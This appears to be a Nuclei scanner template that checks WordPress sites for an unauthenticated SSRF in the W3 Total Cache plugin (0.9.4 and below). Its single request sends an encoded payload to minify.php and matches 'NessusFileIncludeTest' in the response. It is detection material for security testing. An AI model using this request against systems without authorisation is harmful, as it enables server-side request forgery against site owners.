id: w3c-total-cache-ssrf

info:
  name: Wordpress W3C Total Cache <= 0.9.4 - Server Side Request Forgery (SSRF)
  author: random_robbie
  severity: medium
  description: |
    The W3 Total Cache WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.
  reference:
    - https://wpvulndb.com/vulnerabilities/8644
    - https://klikki.fi/adv/w3_total_cache.html
  metadata:
    max-request: 1
  tags: wordpress,wp-plugin,cache,ssrf,wp

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css'

    matchers:
      - type: word
        part: body
        words:
          - "NessusFileIncludeTest"

# digest: 490a00463044022003a2982d19fdb37bad526ab3e99af98df8c75bb222a69267e24ae2a0750c0080022021ccc7dceb5c58e3adc7f902c000d313301da77b0ac69aa1a1a05ce0b8244630:922c64590222798bb761d5b6d8e72950
